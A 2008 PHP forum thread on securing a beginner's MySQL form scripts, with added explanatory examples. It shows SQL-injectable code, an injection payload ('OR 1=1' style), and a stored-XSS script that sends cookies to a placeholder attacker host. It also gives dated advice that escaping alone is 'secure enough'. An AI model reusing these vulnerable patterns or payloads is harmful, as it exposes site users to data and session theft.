Scud, posted March 23, 2008 (https://forums.phpfreaks.com/topic/97514-using-php-script-to-send-email-from-html-form/)

Hi guys; after a day of experimenting I finally got it all to work. I am now able to add records to my database through an HTML field, and I can now search for a usercode in an HTML field and it will bring up the matching record. Now I am happy, or at least I thought I would be. I made an earlier post and another guy mentioned to make sure the database entries, viewing and so on are secure, something about MySQL injections and so on. I am still new to all this and therefore I have no idea what this is; regardless, I would like my site to be as secure as possible. At the moment it is as follows.

insert.php:

```php
<?php
$con = mysql_connect("localhost", "user", "password");
if (!$con) {
    die('Could not connect: ' . mysql_error());
}
mysql_select_db("mydata", $con);

// The six posted form values are placed straight into the SQL text.
$sql = "INSERT INTO `my table` (var1, var2, var3, var4, var5, var6)
        VALUES ('$_POST[var1]','$_POST[var2]','$_POST[var3]','$_POST[var4]','$_POST[var5]','$_POST[var6]')";

if (!mysql_query($sql, $con)) {
    die('Error: ' . mysql_error());
}
echo "Record has been added";
mysql_close($con);
?>
```

An insert from my index page:

```html
<td colspan="4" background="http://www.mysite.com.au/images/index_13.gif">
<form action="insert.php" method="post">
  <table width="541" border="0" align="center">
    <tr>
      <td width="69"><div align="right"><span class="style2">CustomerName:*</span></div></td>
      <td width="151"><label><input type="text" name="var1" id="var1" tabindex="1" /></label></td>
      <td width="175" class="style2"><div align="right">Store:*</div></td>
      <td width="128"><label><input type="text" name="var2" id="var2" tabindex="2" /></label></td>
    </tr>
    <tr>
      <td class="style2"><div align="right">Code*</div></td>
      <td><label><input type="text" name="var3" id="var3" tabindex="3" /></label></td>
      <td class="style2"><div align="right">Status*:</div></td>
      <td><label>
        <select id="anrede" name="var4" tabindex="4" onFocus="FocusCol(this)" onBlur="BlurCol(this)">
          <option value="Complete - Awaiting Pick-Up" selected>Complete</option>
          <option value="Not Yet Complete. Please Check Back Soon">Uncomplete</option>
        </select>
      </label></td>
    </tr>
    <tr>
      <td class="style2"><div align="right">Notes*</div></td>
      <td><label><input type="text" name="var5" id="var5" tabindex="5" /></label></td>
      <td class="style2"><div align="right">Staff Member*</div></td>
      <td><label><input type="text" name="var6" id="var6" tabindex="6" /></label></td>
    </tr>
  </table>
  <label></label>
  <div align="center">
    <input name="button" type="submit" id="button" value="Submit" tabindex="13" />
  </div>
</form>
</td>
```

Now to read database entries, the findcode.php file:

```php
<?php
$q = $_GET["q"];
$con = mysql_connect("localhost", "username", "password");
if (!$con) {
    die('Could not connect: ' . mysql_error());
}
mysql_select_db("mydb", $con);

// The search term from the query string is placed straight into the SQL text.
$result = mysql_query("SELECT * FROM tabel WHERE row='$q'");
while ($row = mysql_fetch_array($result)) {
    echo "Customer Code: " . $row['var1'] . " Code: " . $row['var2'] . " Store: " . $row['var3']
       . " Notes: " . $row['var4'] . " Status: " . $row['var5'];
    echo " ";
}
?>
<html>
<head>
  <script src="selectuser.js"></script>
</head>
<body>
<form name="form" action="findcode.php" method="get">
  <input type="text" name="q" />
  <input type="submit" name="Submit" value="Search" />
</form>
</body>
</html>
```

Thanks guys, hopefully it's secure enough for me not to have to make alterations... looking forward to feedback, thanks in advance.

(edited by kenrbnsn to change the tags to tags)
uniflare, posted March 24, 2008

MySQL injection is quite simple to overcome; all you need to do (imo) is use mysql_escape_string() on any string you are using in a query, like field names, field values or table names etc. E.g.:

```php
<?php
$q = $_GET["q"];
$con = mysql_connect("localhost", "username", "password");
if (!$con) {
    die('Could not connect: ' . mysql_error());
}
mysql_select_db("mydb", $con);

$result = mysql_query("SELECT * FROM tabel WHERE row='$q'");
while ($row = mysql_fetch_array($result)) {
    echo "Customer Code: " . $row['var1'] . " Code: " . $row['var2'] . " Store: " . $row['var3']
       . " Notes: " . $row['var4'] . " Status: " . $row['var5'];
    echo " ";
}
?>
<html>
<head>
  <script src="selectuser.js"></script>
</head>
<body>
<form name="form" action="findcode.php" method="get">
  <input type="text" name="q" />
  <input type="submit" name="Submit" value="Search" />
</form>
</body>
</html>
```

The above code should be written as:

```php
<?php
$q = $_GET["q"];
$con = mysql_connect("localhost", "username", "password");
if (!$con) {
    die('Could not connect: ' . mysql_error());
}
mysql_select_db("mydb", $con);

// Escape the search term before it is placed inside the quoted SQL literal.
$result = mysql_query("SELECT * FROM tabel WHERE row='" . mysql_escape_string($q) . "'");
while ($row = mysql_fetch_array($result)) {
    echo "Customer Code: " . $row['var1'] . " Code: " . $row['var2'] . " Store: " . $row['var3']
       . " Notes: " . $row['var4'] . " Status: " . $row['var5'];
    echo " ";
}
?>
<html>
<head>
  <script src="selectuser.js"></script>
</head>
<body>
<form name="form" action="findcode.php" method="get">
  <input type="text" name="q" />
  <input type="submit" name="Submit" value="Search" />
</form>
</body>
</html>
```

And insert.php should be:

```php
<?php
$con = mysql_connect("localhost", "user", "password");
if (!$con) {
    die('Could not connect: ' . mysql_error());
}
mysql_select_db("mydata", $con);

// Each posted value is escaped before it is placed inside its quoted SQL literal.
$sql = "INSERT INTO `my table` (var1, var2, var3, var4, var5, var6) VALUES ('"
     . mysql_escape_string($_POST['var1']) . "','"
     . mysql_escape_string($_POST['var2']) . "','"
     . mysql_escape_string($_POST['var3']) . "','"
     . mysql_escape_string($_POST['var4']) . "','"
     . mysql_escape_string($_POST['var5']) . "','"
     . mysql_escape_string($_POST['var6']) . "')";

if (!mysql_query($sql, $con)) {
    die('Error: ' . mysql_error());
}
echo "Record has been added";
mysql_close($con);
?>
```

Hope this helps.
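The following is an added example, not code from the thread or from uniflare. It runs the search from Scud's findcode.php three ways against an in-memory SQLite database through PDO, so it works offline without a MySQL server: as posted, with the value escaped the way uniflare suggests, and as a prepared statement. It assumes the table is called `tabel` as in findcode.php and that the column being searched is `usercode` (the thread never names the real column); the two sample rows are constructed here. The last function shows the caveat a practitioner would want: escaping quote characters only protects a value that sits inside a quoted string literal, so it does nothing for numeric columns, `ORDER BY`, `LIMIT` or table and column names, which is why prepared statements are the right default.

```php
<?php
// Added example, not code from the thread. Assumptions: table `tabel` as in
// findcode.php, search column `usercode` (hypothetical), constructed sample rows.

function buildDb(): PDO {
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE tabel (id INTEGER PRIMARY KEY, usercode TEXT, var1 TEXT, var4 TEXT)');
    $ins = $db->prepare('INSERT INTO tabel (usercode, var1, var4) VALUES (?, ?, ?)');
    $ins->execute(['AB123', 'Alice', 'Complete - Awaiting Pick-Up']);             // constructed
    $ins->execute(['CD456', 'Bob',   'Not Yet Complete. Please Check Back Soon']); // constructed
    return $db;
}

// 1. As posted: the request parameter becomes part of the SQL text itself.
function findUnsafe(PDO $db, string $q): array {
    return $db->query("SELECT * FROM tabel WHERE usercode='$q'")->fetchAll(PDO::FETCH_ASSOC);
}

// 2. uniflare's approach, escaping the value before it is pasted into the
//    string. PDO::quote() is the driver-aware equivalent of mysql_escape_string()
//    (it also adds the surrounding quotes), so the quote in the payload is neutralised.
function findEscaped(PDO $db, string $q): array {
    return $db->query("SELECT * FROM tabel WHERE usercode=" . $db->quote($q))->fetchAll(PDO::FETCH_ASSOC);
}

// 3. Prepared statement: the SQL is fixed, $q is bound as data and cannot change
//    the statement's structure. This is the form to use for every query.
function findPrepared(PDO $db, string $q): array {
    $stmt = $db->prepare('SELECT * FROM tabel WHERE usercode = ?');
    $stmt->execute([$q]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// 4. The limit of escaping: it only matters inside a quoted string literal.
//    Where the value is used unquoted (numeric column, ORDER BY, LIMIT, a table
//    name) the attacker needs no quote character, so escaping quotes changes
//    nothing. SQLite-style quote doubling stands in for the escape here.
function findByIdEscaped(PDO $db, string $id): array {
    $escaped = str_replace("'", "''", $id);
    return $db->query("SELECT * FROM tabel WHERE id=" . $escaped)->fetchAll(PDO::FETCH_ASSOC);
}

$db = buildDb();
$payload = "' OR '1'='1";   // closes the opening quote, then appends a tautology
printf("unsafe:   %d rows\n", count(findUnsafe($db, $payload)));   // 2: the whole table leaks
printf("escaped:  %d rows\n", count(findEscaped($db, $payload)));  // 0: searched as literal text
printf("prepared: %d rows\n", count(findPrepared($db, $payload))); // 0
printf("prepared, real code: %d rows\n", count(findPrepared($db, 'AB123')));  // 1
printf("escaped but unquoted: %d rows\n", count(findByIdEscaped($db, '1 OR 1=1'))); // 2: escaping did not help
```

With the old mysql_* extension the closest equivalent of PDO::quote() was mysql_real_escape_string(), which, unlike mysql_escape_string(), takes the connection's character set into account; with mysqli the prepared form is `$stmt = $mysqli->prepare('SELECT * FROM tabel WHERE usercode = ?'); $stmt->bind_param('s', $q); $stmt->execute();`. In every case the table and column names must come from the script, never from the request, because no escaping function can make an identifier safe.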
Scud (author), posted March 24, 2008

Thank you very much for that, much appreciated. So you would think that is pretty secure with that escape string? Any other suggestions? I want it to be as tight as possible.
Scud (author), posted April 16, 2008

Is the above script, with the MySQL injection script, secure enough to handle client information?
uniflare, posted April 20, 2008

I would say it is, yes. If you are going to be storing customer credit card numbers etc. you will need to read up on the laws of your country. If you are just temporarily using the credit card numbers you should always use SSL encrypted connections. For general website security you should always use mysql_escape_string() on any MySQL query values, and also use htmlentities() (or a similar function) on all data displayed on your website that you don't wish HTML/JavaScript to be run in (e.g. usernames/signatures/profiles etc.).
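The following is an added example, not code from the thread or from uniflare. It renders a stored record the way findcode.php does, once as posted and once with output encoding applied at the point where each value enters the HTML. The field names var1..var5 follow Scud's scripts; the record is constructed here and carries a script tag in the Notes field, which is exactly what anyone could submit through the unrestricted text inputs of insert.php. It also shows the same helper used for an attribute value, since a quote character rather than an angle bracket is what breaks out of an attribute.

```php
<?php
// Added example, not code from the thread. The record below is constructed;
// the hostname in it is a placeholder.

// Encode a value for an HTML text node or a quoted attribute value.
// htmlspecialchars() covers the characters that matter (& < > " '); ENT_QUOTES
// is required so the value is also safe inside single-quoted attributes, and
// the charset must match the page (PHP before 5.4 defaulted to ISO-8859-1).
function e(string $value): string {
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// As posted in findcode.php: every column goes into the page unchanged.
function renderRaw(array $row): string {
    return "Customer Code: " . $row['var1'] . " Code: " . $row['var2']
         . " Store: " . $row['var3'] . " Notes: " . $row['var4']
         . " Status: " . $row['var5'];
}

// Hardened: every column is encoded where it is concatenated into the HTML.
function renderEncoded(array $row): string {
    return "Customer Code: " . e($row['var1']) . " Code: " . e($row['var2'])
         . " Store: " . e($row['var3']) . " Notes: " . e($row['var4'])
         . " Status: " . e($row['var5']);
}

// Pre-filling the search box with the last query puts the value in an
// attribute; the same encoder handles that context because of ENT_QUOTES.
function renderSearchBox(string $q): string {
    return '<input type="text" name="q" value="' . e($q) . '" />';
}

// Constructed record, as it would come back from the database after someone
// typed a script tag into the Notes field of the insert form.
$row = [
    'var1' => 'Alice',
    'var2' => 'AB123',
    'var3' => 'City Store',
    'var4' => '<script>location="http://evil.example/?c="+document.cookie</script>',
    'var5' => 'Complete - Awaiting Pick-Up',
];

echo renderRaw($row), "\n";      // a browser would run the script for every visitor who views this record
echo renderEncoded($row), "\n";  // the tag is shown as literal text: &lt;script&gt;...
echo renderSearchBox('" onfocus="alert(1)'), "\n"; // the quote becomes &quot;, the attribute stays closed
```

Encoding belongs at output, not at insert time: the database should hold the text the user actually typed, and each place that displays it applies the encoding for its own context (HTML body, attribute, JavaScript string, URL), since one stored form cannot be correct for all of them.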